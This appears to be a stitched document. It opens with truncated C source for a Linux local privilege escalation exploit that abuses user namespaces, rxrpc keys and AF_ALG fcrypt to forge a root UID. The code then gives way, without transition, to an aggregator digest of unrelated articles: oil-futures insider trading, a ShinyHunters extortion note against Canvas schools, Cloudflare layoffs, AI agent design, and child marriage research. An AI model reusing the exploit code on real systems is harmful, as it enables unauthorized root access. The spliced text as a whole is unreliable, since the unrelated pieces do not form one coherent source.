#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <poll.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/rxrpc.h>
#include <linux/keyctl.h>
#include <linux/if_alg.h>
#include <net/if.h>
#include <termios.h>

#ifndef AF_RXRPC
#define AF_RXRPC 33
#endif
#ifndef PF_RXRPC
#define PF_RXRPC AF_RXRPC
#endif
#ifndef SOL_RXRPC
#define SOL_RXRPC 272
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef MSG_SPLICE_PAGES
#define MSG_SPLICE_PAGES 0x8000000
#endif

/* ---- rxrpc constants ---- */
#define RXRPC_PACKET_TYPE_DATA      1
#define RXRPC_PACKET_TYPE_ACK       2
#define RXRPC_PACKET_TYPE_ABORT     4
#define RXRPC_PACKET_TYPE_CHALLENGE 6
#define RXRPC_PACKET_TYPE_RESPONSE  7
#define RXRPC_CLIENT_INITIATED 0x01
#define RXRPC_REQUEST_ACK      0x02
#define RXRPC_LAST_PACKET      0x04
#define RXRPC_CHANNELMASK 3
#define RXRPC_CIDSHIFT    2

struct rxrpc_wire_header {
    uint32_t epoch;
    uint32_t cid;
    uint32_t callNumber;
    uint32_t seq;
    uint32_t serial;
    uint8_t  type;
    uint8_t  flags;
    uint8_t  userStatus;
    uint8_t  securityIndex;
    uint16_t cksum;     /* big-endian on wire */
    uint16_t serviceId;
} __attribute__((packed));

struct rxkad_challenge {
    uint32_t version;
    uint32_t nonce;
    uint32_t min_level;
    uint32_t __padding;
} __attribute__((packed));

/* Attacker-chosen 8-byte session key used for the rxkad token.
 * Mutable because the LPE brute-force iterates over keys looking for
 * one that decrypts the file's UID field to a "0:" prefix. */
static uint8_t SESSION_KEY[8] = { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08 };

#define LOG(fmt, ...)  fprintf(stderr, "[+] " fmt "\n", ##__VA_ARGS__)
#define WARN(fmt, ...) fprintf(stderr, "[!] " fmt "\n", ##__VA_ARGS__)
#define DBG(fmt, ...)  fprintf(stderr, "[.] " fmt "\n", ##__VA_ARGS__)

/* =================================================================== */
/* unshare + map setup                                                 */
/* =================================================================== */

static int write_file(const char *path, const char *fmt, ...)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    char buf[256];
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, sizeof(buf), fmt, ap);
    va_end(ap);
    int r = (int)write(fd, buf, n);
    close(fd);
    return r;
}

static int do_unshare_userns_netns(void)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        WARN("unshare(NEWUSER|NEWNET): %s", strerror(errno));
        return -1;
    }
    LOG("unshare(USER|NET) OK, real uid=%u", real_uid);
    write_file("/proc/self/setgroups", "deny");
    if (write_file("/proc/self/uid_map", "%u %u 1", real_uid, real_uid) < 0) {
        WARN("uid_map: %s", strerror(errno));
        return -1;
    }
    if (write_file("/proc/self/gid_map", "%u %u 1", real_gid, real_gid) < 0) {
        WARN("gid_map: %s", strerror(errno));
        return -1;
    }
    LOG("uid/gid identity-mapped %u/%u; gained CAP_NET_RAW within netns",
        real_uid, real_gid);

    /* ifup lo */
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s >= 0) {
        struct ifreq ifr;
        memset(&ifr, 0, sizeof(ifr));
        strcpy(ifr.ifr_name, "lo");
        if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {
            ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
            if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0)
                WARN("SIOCSIFFLAGS lo: %s", strerror(errno));
            else
                LOG("lo brought UP in new netns");
        }
        close(s);
    }
    return 0;
}

/* =================================================================== */
/* rxrpc key (rxkad v1 token with attacker session key)                */
/* =================================================================== */

static long key_add(const char *type, const char *desc, const void *payload,
                    size_t plen, int ringid)
{
    return syscall(SYS_add_key, type, desc, payload, plen, ringid);
}

static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen)
{
    uint8_t *p = out;
    uint32_t now = (uint32_t)time(NULL);
    uint32_t expires = now + 86400;

    *(uint32_t *)p = htonl(0); p += 4;      /* flags */
    const char *cell = "evil";
    uint32_t clen = strlen(cell);
    *(uint32_t *)p = htonl(clen); p += 4;
    memcpy(p, cell, clen);
    uint32_t pad = (4 - (clen & 3)) & 3;
    memset(p + clen, 0, pad);
    p += clen + pad;
    *(uint32_t *)p = htonl(1); p += 4;      /* ntoken */

    uint8_t *toklen_p = p; p += 4;
    uint8_t *tokstart = p;
    *(uint32_t *)p = htonl(2); p += 4;      /* sec_ix = RXKAD */
    *(uint32_t *)p = htonl(0); p += 4;      /* vice_id */
    *(uint32_t *)p = htonl(1); p += 4;      /* kvno */
    memcpy(p, SESSION_KEY, 8); p += 8;      /* session_key K */
    *(uint32_t *)p = htonl(now); p += 4;
    *(uint32_t *)p = htonl(expires); p += 4;
    *(uint32_t *)p = htonl(1); p += 4;      /* primary_flag */
    *(uint32_t *)p = htonl(8); p += 4;      /* ticket_len */
    memset(p, 0xCC, 8); p += 8;             /* ticket */
    uint32_t toklen = (uint32_t)(p - tokstart);
    *(uint32_t *)toklen_p = htonl(toklen);

    if ((size_t)(p - out) > maxlen) {
        errno = E2BIG;
        return -1;
    }
    return (int)(p - out);
}

static long add_rxrpc_key(const char *desc)
{
    uint8_t buf[512];
    int n = build_rxrpc_v1_token(buf, sizeof(buf));
    if (n < 0)
        return -1;
    return key_add("rxrpc", desc, buf, n, KEY_SPEC_PROCESS_KEYRING);
}

/* =================================================================== */
/* AF_ALG pcbc(fcrypt) helpers                                         */
/* =================================================================== */

static int alg_open_pcbc_fcrypt(const uint8_t key[8])
{
    int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (s < 0) {
        WARN("socket(AF_ALG): %s", strerror(errno));
        return -1;
    }
    struct sockaddr_alg sa = { .salg_family = AF_ALG };
    strcpy((char *)sa.salg_type, "skcipher");
    strcpy((char *)sa.salg_name, "pcbc(fcrypt)");
    if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        WARN("bind(AF_ALG pcbc(fcrypt)): %s", strerror(errno));
        close(s);
        return -1;
    }
    if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) {
        WARN("ALG_SET_KEY: %s", strerror(errno));
        close(s);
        return -1;
    }
    return s;
}

/* Encrypt-or-decrypt a 1+ block of data with a given IV. */
static int alg_op(int alg_s, int op, const uint8_t iv[8],
                  const void *in, size_t inlen, void *out)
{
    int op_fd = accept(alg_s, NULL, NULL);
    if (op_fd < 0) {
        WARN("accept(AF_ALG): %s", strerror(errno));
        return -1;
    }

    char cbuf[CMSG_SPACE(sizeof(int)) +
              CMSG_SPACE(sizeof(struct af_alg_iv) + 8)] = {0};
    struct msghdr msg = {0};
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);

    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_ALG;
    c->cmsg_type = ALG_SET_OP;
    c->cmsg_len = CMSG_LEN(sizeof(int));
    *(int *)CMSG_DATA(c) = op;

    c = CMSG_NXTHDR(&msg, c);
    c->cmsg_level = SOL_ALG;
    c->cmsg_type = ALG_SET_IV;
    c->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + 8);
    struct af_alg_iv *aiv = (struct af_alg_iv *)CMSG_DATA(c);
    aiv->ivlen = 8;
    memcpy(aiv->iv, iv, 8);

    struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen };
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    /* ... remainder of the exploit truncated in the original message ... */
```

Grand Theft Oil Futures

paulkrugman.substack.com

Source: CNBC, Financial Times, BBC, Reuters

At this point it’s al­most rou­tine: Almost every time Donald Trump makes a ma­jor an­nounce­ment about the Iran War, that an­nounce­ment is pre­ceded — some­times by only a few min­utes — by huge and hugely prof­itable bets in the oil mar­ket.

The in­flu­en­tial Kobeissi Letter doc­u­ments the lat­est ex­am­ple:


BREAKING: According to our analy­sis, ~$920 mil­lion worth of crude oil shorts were taken 70 min­utes be­fore an Axios re­port claimed the US and Iran were near a 14-point” deal to end the war.

At 3:40 AM ET to­day, nearly 10,000 con­tracts worth of crude oil shorts were taken with­out any ma­jor news.

This is equiv­a­lent to ~$920 mil­lion in no­tional value, an un­usu­ally large trade for 3:40 AM ET.

At 4:50 AM ET, just 70 minutes later, Axios reported that the US is “close” to a “memorandum of understanding” to end the Iran War.

By 7:00 AM ET, oil prices had fallen over -12% with these crude oil shorts gain­ing ap­prox­i­mately +$125 mil­lion.

Minutes later, Iran launched the “Persian Gulf Strait Authority” and oil prices surged +8%.

What just hap­pened?
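
As a rough sanity check on those figures (a sketch only: the 1,000-barrels-per-contract size is my assumption of a standard crude futures contract, not something the letter states), the numbers hang together:

```python
# Back-of-envelope check of the Kobeissi Letter's figures.
contracts = 10_000            # reported number of short contracts
barrels_per_contract = 1_000  # assumed standard crude futures contract size
notional = 920e6              # reported ~$920M notional

implied_price = notional / (contracts * barrels_per_contract)
print(f"implied oil price: ${implied_price:.0f}/bbl")  # ~$92/bbl

drop = 0.12                   # prices fell over 12% by 7:00 AM ET
gain = notional * drop
print(f"gain on the shorts: ~${gain / 1e6:.0f}M")
# ~$110M, the same order as the reported ~$125 million
```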

As the BBC among others has documented, this isn’t the first time, or the second time, that this has happened. Again and again, just before Trump makes announcements that raise hopes about the reopening of the Strait of Hormuz, one or more “whales,” very large traders, sell large quantities of oil futures, almost instantly reaping big profits as prices fall.

What’s truly re­mark­able is that this keeps hap­pen­ing even though the pat­tern has be­come fa­mil­iar. This tells us two things: The Trump ad­min­is­tra­tion is mak­ing no real ef­fort to crack down on who­ever is trad­ing us­ing in­side in­for­ma­tion, and these in­side traders are op­er­at­ing with a com­plete sense of im­punity, as­sured that they can get away with it.

The stench of cor­rup­tion is over­whelm­ing. Yet aside from the raw cor­rup­tion, these in­ci­dents also raise a larger ques­tion. The in­sid­ers ripped off the par­ties who sold fu­tures to them at what turned out to be very un­fa­vor­able prices to the sell­ers. What broader dam­age does this kind of unchecked in­sider trad­ing do?

There’s both a nar­row and a broad an­swer.

The nar­row an­swer in­volves eco­nomic ef­fi­ciency. How is the func­tion­ing of the econ­omy af­fected by the re­al­iza­tion that some­body — it’s not hard to make guesses, but we don’t know for sure — is trad­ing oil fu­tures based on ad­vance knowl­edge about what will soon ap­pear on Truth Social or Fox News?

It took me a while to fig­ure this out. But I think I have an an­swer.

First, ask your­self what pur­pose is served by the oil fu­tures mar­ket. Unlike the pre­dic­tion mar­kets Polymarket and Kalshi, the oil fu­tures mar­ket is not in­tended to be mainly a ve­hi­cle for gam­bling. Instead, it is a mar­ket that serves to re­duce risk through hedg­ing.

Here’s how it works. There are peo­ple and in­sti­tu­tions, such as oil pro­duc­ers, who will need to sell oil at a fu­ture date. They want to lock in the price to­day on those fu­ture sales. There are also peo­ple and in­sti­tu­tions, such as air­lines, who have a fu­ture need for oil and would like to lock in the price to­day. Thus the fu­tures mar­ket lets both sell­ers and buy­ers of oil elim­i­nate a ma­jor source of risk — fluc­tu­a­tions in the price of oil. This re­duces un­cer­tainty in the econ­omy as a whole.
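
A toy numeric sketch of that hedge (all numbers hypothetical, not from the post) shows why the buyer’s net cost is locked in regardless of where the spot price goes:

```python
# Toy hedge: an airline needs 1,000 barrels next month and buys
# futures today at a hypothetical $90/bbl.
futures_price = 90.0
volume = 1_000  # barrels

for spot in (70.0, 90.0, 110.0):
    fuel_bill = spot * volume                      # paid in the spot market next month
    futures_pnl = (spot - futures_price) * volume  # gain/loss on the long futures position
    net_cost = fuel_bill - futures_pnl             # always futures_price * volume
    print(f"spot ${spot:>5.0f}/bbl -> net cost ${net_cost:,.0f}")
# Prints $90,000 in every scenario: price risk has been traded for certainty.
```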

But what if there are sub­stan­tial play­ers in the fu­tures mar­ket with in­side in­for­ma­tion? Then if you are, say, a cor­po­ra­tion try­ing to lock in the price of oil you plan to buy next month, you may not be mak­ing a mu­tu­ally ben­e­fi­cial deal with fu­ture sell­ers. You may, in­stead, be be­ing played for a sucker — pay­ing what in ret­ro­spect will have been an ex­ces­sive price — by peo­ple who know what’s about to ap­pear in the pres­i­den­t’s so­cial me­dia feed.

The same could ap­ply to sell­ers of oil fu­tures, al­though the ex­am­ples of in­sider trad­ing we know about in­volved Trump in­sid­ers get­ting ahead of falling, not ris­ing, prices.

Either way, the ef­fect of traders’ sus­pi­cion that they may be losers in a rigged game will be to make them re­luc­tant to play at all — re­luc­tant ei­ther to buy or to sell oil fu­tures. And this will mean los­ing the risk-re­duc­ing ben­e­fits of a prop­erly func­tion­ing fu­tures mar­ket.

Now, in­sider trad­ing of oil fu­tures prob­a­bly is­n’t big enough to do crit­i­cal dam­age to those mar­kets. But it does do dam­age, which hurts all of us, not just the buy­ers who got stuck with the im­me­di­ate losses.

And be­yond the nar­row eco­nomic losses, in­sider trad­ing on oil is part of the broader rise of what we can call the pre­da­tion econ­omy.

Under Trump II, cor­rup­tion runs ram­pant. Success in busi­ness de­pends not on what you know but on who you know, and there are no rules be­yond hav­ing — and, ob­vi­ously, buy­ing — the right con­nec­tions.

This is bad for everyone who doesn’t have those connections. It’s bad for economic growth. And it undermines the moral basis of the economy and society as a whole. It’s the path by which a country slides into third-world status.

I’ll have much more to say about the pre­da­tion econ­omy in fu­ture posts.

MUSICAL CODA


Canvas is down as ShinyHunters threatens to leak schools’ data

www.theverge.com

Emma Roth


The Instructure-owned learn­ing man­age­ment plat­form, Canvas, is down af­ter re­cently con­firm­ing a mas­sive data breach that im­pacted stu­dent names, email ad­dresses, ID num­bers, and mes­sages. Students at­tempt­ing to ac­cess the sys­tem on Thursday saw a mes­sage from the hack­ing group ShinyHunters, which claimed re­spon­si­bil­ity for the at­tack:

ShinyHunters has breached Instructure (again). Instead of contacting us to resolve it they ignored us and did some “security patches.” If any of the schools in the affected list are interested in preventing the release of their data, please consult with a cyber advisory firm and contact us privately at TOX to negotiate a settlement. You have till the end of the day by 12 May 2026 before everything is leaked.

The message included a link to a list of schools ShinyHunters claims to have breached through Canvas.

Instructure has placed Canvas, Canvas Beta and Canvas Test in “maintenance mode,” according to Instructure’s status page. “We anticipate being up soon, and will provide updates as soon as possible.”

Instructure said last week that it deployed patches to “enhance system security” following the breach. ShinyHunters — which has claimed responsibility for attacks on Ticketmaster, AT&T, Rockstar Games, ADT, and Vercel — said its data leak site contains 9,000 schools, including data belonging to 275 million students, teachers, and other staff, according to Bleeping Computer.

Update, May 7th: Added Instructure’s maintenance mode message.


Building For The Future

blog.cloudflare.com

2026-05-07

3 min read

This af­ter­noon, we sent the fol­low­ing email to our global team. One of our core val­ues at Cloudflare is trans­parency, and we be­lieve it’s im­por­tant that you hear this di­rectly from us be­cause it’s a ma­jor mo­ment at Cloudflare.


Team:

We are writ­ing to let you know di­rectly that we’ve made the de­ci­sion to re­duce Cloudflare’s work­force by more than 1,100 em­ploy­ees glob­ally.

The way we work at Cloudflare has fun­da­men­tally changed. We don’t just build and sell AI tools and plat­forms. We are our own most de­mand­ing cus­tomer. Cloudflare’s us­age of AI has in­creased by more than 600% in the last three months alone. Employees across the com­pany from en­gi­neer­ing to HR to fi­nance to mar­ket­ing run thou­sands of AI agent ses­sions each day to get their work done. That means we have to be in­ten­tional in how we ar­chi­tect our com­pany for the agen­tic AI era in or­der to su­per­charge the value we de­liver to our cus­tomers and to honor our mis­sion to help build a bet­ter Internet for every­one, every­where.

Today is a hard day. This de­ci­sion un­for­tu­nately means say­ing good­bye to team­mates who have con­tributed mean­ing­fully to our mis­sion and to build­ing Cloudflare into one of the world’s most suc­cess­ful com­pa­nies. We want to be clear that this de­ci­sion is not a re­flec­tion of the in­di­vid­ual work or tal­ent of those leav­ing us. Instead, we are reimag­in­ing every in­ter­nal process, team, and role across the com­pany. Today’s ac­tions are not a cost-cut­ting ex­er­cise or an as­sess­ment of in­di­vid­u­als’ per­for­mance; they are about Cloudflare defin­ing how a world-class, high-growth com­pany op­er­ates and cre­ates value in the agen­tic AI era.

This is a mo­ment we need to own as founders and lead­ers of the com­pany. Matthew has per­son­ally sent out every of­fer let­ter we’ve ex­tended. It is a prac­tice he has al­ways looked for­ward to be­cause it rep­re­sented our growth and the in­cred­i­ble tal­ent join­ing our mis­sion. It did­n’t feel right for this mes­sage to come from any­one other than the two of us. Rather than trick­ling out no­tices through man­agers, we will be send­ing emails to every em­ployee.

Within the next hour, every mem­ber of our global team will re­ceive an email from both of us clar­i­fy­ing how this change af­fects them. For those de­part­ing to­day, we will send this up­date to both their per­sonal and Cloudflare ad­dresses to en­sure they re­ceive the in­for­ma­tion im­me­di­ately.

It’s im­por­tant to us that we treat de­part­ing team mem­bers right and in a way that ex­ceeds what we’ve seen from other com­pa­nies. We be­lieve act­ing with em­pa­thy is­n’t about avoid­ing hard de­ci­sions but rather about how you treat peo­ple when those de­ci­sions are made. If we are ask­ing our team to be world-class, we have a rec­i­p­ro­cal oblig­a­tion to be world-class in how we treat them. We are pair­ing the di­rect­ness of these mea­sures with sev­er­ance pack­ages that lead the in­dus­try. The pack­ages for de­part­ing em­ploy­ees will in­clude the equiv­a­lent of their full base pay through the end of 2026. Healthcare cov­er­age is dif­fer­ent across the globe, and if you’re in the United States, we’ll con­tinue to pro­vide sup­port through the end of the year. We are also vest­ing eq­uity for de­part­ing team mem­bers through August 15th, so they re­ceive stock be­yond their de­par­ture date. And, if de­part­ing team mem­bers haven’t hit their one-year cliffs, we are go­ing to waive those and vest their pro-rated eq­uity through August as well.

We’ve asked the team to do this only once, as hard as that may be to­day. We don’t want to do it again for the fore­see­able fu­ture. By tak­ing de­ci­sive ac­tion now, we pro­vide im­me­di­ate clar­ity to those de­part­ing and pro­tect the sta­bil­ity of the team that re­mains. We are mak­ing these changes now be­cause mak­ing smaller, re­peated cuts or drag­ging a re­or­ga­ni­za­tion out over mul­ti­ple quar­ters cre­ates pro­longed emo­tional un­cer­tainty for em­ploy­ees and stalls our abil­ity to build. It’s the right thing to do; it’s the hon­est thing to do; and it re­flects the val­ues of the com­pany we are con­tin­u­ing to build.

Cloudflare started as a dig­i­tally na­tive com­pany built in the cloud. That al­lowed us to catch up to and pass com­pa­nies that had a head start of years or decades but were slowed down by out­dated sys­tems and processes. As we’ve now be­come the leader, we can­not rest on the work­flows and or­ga­ni­za­tional struc­tures that worked yes­ter­day. We’re con­fi­dent that our re­shaped or­ga­ni­za­tion will be even faster and more in­no­v­a­tive as we con­tinue build­ing the fu­ture.

To those de­part­ing us: you’ve helped build the strong foun­da­tion Cloudflare stands on to­day. We have the ut­most re­spect for your work and grat­i­tude for the im­pact you have made. We’re con­fi­dent you will land at other great places and build many fu­ture great com­pa­nies, bring­ing with you a unique set of skills learned while build­ing Cloudflare.

Transparency is a core prin­ci­ple at Cloudflare, and it was im­por­tant that you hear this from us first. We will be head­ing to our earn­ings con­fer­ence call at 2 PM PT, when we’ll share more. We also plan to ad­dress to­day’s an­nounce­ments live with the team at our all-hands meet­ing.

It’s not an easy day, but it’s the right de­ci­sion. Our mis­sion to help build a bet­ter Internet is more im­por­tant now than ever, and there’s a lot of work left to be done.


agents need control flow, not more prompts

bsuh.bearblog.dev

bri­an’s thoughts

Home Blog

07 May, 2026

Thesis: re­li­able agents tack­ling com­plex tasks need de­ter­min­is­tic con­trol flow en­coded in soft­ware, not in­creas­ingly elab­o­rate prompt chains

If you’ve ever re­sorted to MANDATORY or DO NOT SKIP, you’ve hit the ceil­ing of prompt­ing.

Imagine a programming language where statements are suggestions and functions return “Success” while hallucinating. Reasoning becomes impossible; reliability collapses as complexity grows.

Software scales through re­cur­sive com­pos­abil­ity: sys­tems built from li­braries, mod­ules, and func­tions. It’s code all the way down. Code ex­poses pre­dictable be­hav­ior, en­abling lo­cal rea­son­ing. Prompt chains lack this prop­erty. While use­ful for nar­row tasks, prompts are non-de­ter­min­is­tic, weakly spec­i­fied, and dif­fi­cult to ver­ify.

Reliability re­quires mov­ing logic out of prose and into run­time. We need de­ter­min­is­tic scaf­folds: ex­plicit state tran­si­tions and val­i­da­tion check­points that treat the LLM as a com­po­nent, not the sys­tem.
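
To make that concrete, here is a minimal sketch of such a scaffold in Python. Everything in it is illustrative rather than taken from the post: call_llm is a hypothetical stand-in for whatever model client you use, and the states, validation rule, and retry budget are made up. The point is that the transitions live in ordinary code, with the model invoked as one step inside them.

```python
from dataclasses import dataclass
from enum import Enum, auto


class State(Enum):
    DRAFT = auto()
    VALIDATE = auto()
    DONE = auto()
    FAILED = auto()


@dataclass
class Task:
    prompt: str
    output: str = ""
    attempts: int = 0


def call_llm(prompt: str) -> str:
    """Hypothetical stand-in for any LLM client call."""
    raise NotImplementedError


def validate(output: str) -> bool:
    """Deterministic checkpoint: cheap, programmatic, no model involved."""
    return bool(output.strip()) and len(output) < 10_000


def run(task: Task, max_attempts: int = 3) -> Task:
    """Explicit state machine; the LLM is a component, not the system."""
    state = State.DRAFT
    while state not in (State.DONE, State.FAILED):
        if state is State.DRAFT:
            task.output = call_llm(task.prompt)  # the only nondeterministic step
            task.attempts += 1
            state = State.VALIDATE
        elif state is State.VALIDATE:
            if validate(task.output):
                state = State.DONE
            elif task.attempts < max_attempts:
                state = State.DRAFT  # retry is decided by code, not by a prompt
            else:
                state = State.FAILED  # fail loudly rather than report "Success"
    return task
```

The model can still hallucinate inside call_llm; the scaffold just guarantees that a bad output hits a checkpoint instead of flowing silently into the next step.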

But deterministic orchestration is only half the battle. In a system prone to silent failure, an agent without aggressive error detection is just a fast way to reach the wrong conclusion. Without programmatic verification (sketched after the list below), we are left with three options:

Babysitter: Keep a hu­man in the loop to catch er­rors be­fore they prop­a­gate.

Auditor: Perform ex­haus­tive end-to-end ver­i­fi­ca­tion af­ter the run.

Prayer: Vibe-accept the outputs.
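
The implied fourth option is to make verification itself programmatic, so errors are caught at a checkpoint rather than by a babysitter or an after-the-fact audit. A hedged sketch, assuming (purely for illustration) that the agent is contracted to emit a JSON object with summary and sources fields:

```python
import json


def verify_agent_output(raw: str) -> list[str]:
    """Return every mechanically checkable failure instead of vibe-accepting.

    The schema here (a JSON object with 'summary' and 'sources') is a made-up
    example; real checks should mirror whatever contract the agent is given.
    """
    errors: list[str] = []
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        return [f"not valid JSON: {exc}"]
    if not isinstance(data, dict):
        return ["top-level value is not an object"]
    summary = data.get("summary")
    if not isinstance(summary, str) or not summary.strip():
        errors.append("missing or empty 'summary'")
    sources = data.get("sources")
    if not isinstance(sources, list) or not sources:
        errors.append("'sources' must be a non-empty list")
    else:
        errors += [
            f"bad source URL: {s!r}"
            for s in sources
            if not isinstance(s, str) or not s.startswith("https://")
        ]
    return errors  # an empty list means the checkpoint passes
```

An empty error list means the checkpoint passes; anything else routes back into the deterministic retry or failure paths, where code, not vibes, decides what happens next.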

Child marriages plunged when girls stayed in school in Nigeria

www.nature.com

NEWS

11 March 2026

Collaboration between researchers and religious leaders cut the likelihood of early marriage by 80%.

By Mariana Lenharo, a reporter for Nature in New York City.

An educational programme for young girls in northern Nigeria that involved local religious leaders massively reduced the number of child marriages, a study reported in Nature today has found [1].


doi: https://doi.org/10.1038/d41586-026-00796-2

Read the associated Policy Brief: ‘Marriage of adolescent girls in Nigeria reduced by 80% by “big push” intervention’.

References

1. Cohen, I., Abubakar, M. & Perlman, D. Nature https://doi.org/10.1038/s41586-026-10206-2 (2026).


10HN is also available as an iOS App

If you visit 10HN only rarely, check out the best articles from the past week.

Visit pancik.com for more.